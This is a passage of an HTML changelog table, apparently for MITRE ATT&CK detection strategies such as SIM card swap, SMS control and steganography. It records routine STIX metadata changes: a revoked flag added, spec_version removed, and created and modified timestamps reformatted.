black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.675000+00:00</td></tr></tbody></table></details><hr><h4>[DET0658] Detection of SIM Card Swap</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.678000+00:00</td></tr></tbody></table></details><hr><h4>[DET0599] Detection of SMS Control</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.669000+00:00</td></tr></tbody></table></details><hr><h4>[DET0686] Detection of SMS Messages</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.688000+00:00</td></tr></tbody></table></details><hr><h4>[DET0646] Detection of SSL Pinning</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.691000+00:00</td></tr></tbody></table></details><hr><h4>[DET0707] Detection of Scheduled Task/Job</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.696000+00:00</td></tr></tbody></table></details><hr><h4>[DET0668] Detection of Screen Capture</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.674000+00:00</td></tr></tbody></table></details><hr><h4>[DET0680] Detection of Security Software Discovery</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.685000+00:00</td></tr></tbody></table></details><hr><h4>[DET0600] Detection of Software Discovery</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.680000+00:00</td></tr></tbody></table></details><hr><h4>[DET0644] Detection of Software Packing</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.674000+00:00</td></tr></tbody></table></details><hr><h4>[DET0656] Detection of Steal Application Access Token</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.676000+00:00</td></tr></tbody></table></details><hr><h4>[DET0677] Detection of Steganography</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.677000+00:00</td></tr></tbody></table></details><hr><h4>[DET0621] Detection of Stored Application Data</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.694000+00:00</td></tr></tbody></table></details><hr><h4>[DET0657] Detection of Subvert Trust Controls</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.679000+00:00</td></tr></tbody></table></details><hr><h4>[DET0628] Detection of Supply Chain Compromise</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.684000+00:00</td></tr></tbody></table></details><hr><h4>[DET0714] Detection of Suppress Application Icon</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.679000+00:00</td></tr></tbody></table></details><hr><h4>[DET0650] Detection of Symmetric Cryptography</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New 